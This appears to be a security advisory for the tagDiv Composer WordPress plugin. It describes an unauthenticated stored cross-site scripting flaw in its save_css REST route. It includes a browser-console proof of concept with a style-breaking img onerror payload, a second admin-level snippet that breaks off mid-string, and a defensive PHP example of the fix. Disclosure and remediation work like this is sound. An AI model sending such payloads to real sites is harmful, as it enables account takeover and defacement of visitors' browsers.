Description

The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not enforce authorisation on a REST route, and neither validates nor escapes some of the parameters it accepts when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks. Note: the issue was partially fixed in 4.1 (still exploitable by Admin+, as only authorisation was added) and fully fixed in 4.2.
Before 4.1:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer".
2. Run the following code in the browser console while logged out:

```javascript
fetch( '/wp-json/tdw/save_css', {
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
    method: "POST",
} );
```

In version 4.1, exploitable by Admin:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer".
2. Log in as an admin, and run the following code in a browser console within WP Admin:

```javascript
await wp.apiRequest( {
    path: 'tdw/save_css',
    type: 'POST',
    data: { compiled_css: "
```
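As an added illustration (not the plugin's own code), the following shows how a WordPress REST route like the one described can carry both controls the advisory says were missing: an authorisation check (what 4.1 added) and validation plus safe output (what 4.2 added). The `tdw` namespace, the option key and every `tdw_example_*` function name are assumptions.

```php
<?php
// Added illustration of the two controls the advisory describes as missing; not tagDiv's code.
// Assumed names: the 'tdw' namespace, the option key and every tdw_example_* function.

add_action( 'rest_api_init', function () {
    register_rest_route( 'tdw', '/save_css', array(
        'methods'  => 'POST',
        'callback' => 'tdw_example_save_css',
        // Authorisation (what 4.1 added): without a permission_callback that checks a
        // capability, any unauthenticated visitor can write into the stored CSS.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'compiled_css' => array(
                'required'          => true,
                // Input validation (what 4.2 added): WordPress runs these before the callback.
                'validate_callback' => 'tdw_example_validate_css',
                'sanitize_callback' => 'tdw_example_sanitize_css',
            ),
        ),
    ) );
} );

// '<' is not needed in ordinary CSS, but it is what lets a value close the enclosing <style>.
function tdw_example_validate_css( $value ) {
    if ( ! is_string( $value ) || strpos( $value, '<' ) !== false ) {
        return new WP_Error( 'rest_invalid_param', 'compiled_css must be a string without "<".', array( 'status' => 400 ) );
    }
    return true;
}

// Defence in depth: strip any markup that validation did not reject.
function tdw_example_sanitize_css( $value ) {
    return wp_strip_all_tags( (string) $value );
}

function tdw_example_save_css( WP_REST_Request $request ) {
    update_option( 'tdw_example_compiled_css', $request->get_param( 'compiled_css' ) );
    return rest_ensure_response( array( 'saved' => true ) );
}

// Output side: re-check the stored value when echoing it, so even CSS saved by an
// administrator (the case still exploitable in 4.1) cannot break out of the style block.
function tdw_example_print_css() {
    $css = get_option( 'tdw_example_compiled_css', '' );
    echo '<style>' . str_replace( '<', '', $css ) . '</style>';
}
add_action( 'wp_head', 'tdw_example_print_css' );
```

Rejecting `<` at input time and stripping it again at output time are independent; keeping both means a value that reached the database by another path is still rendered safely.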
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 4.2 |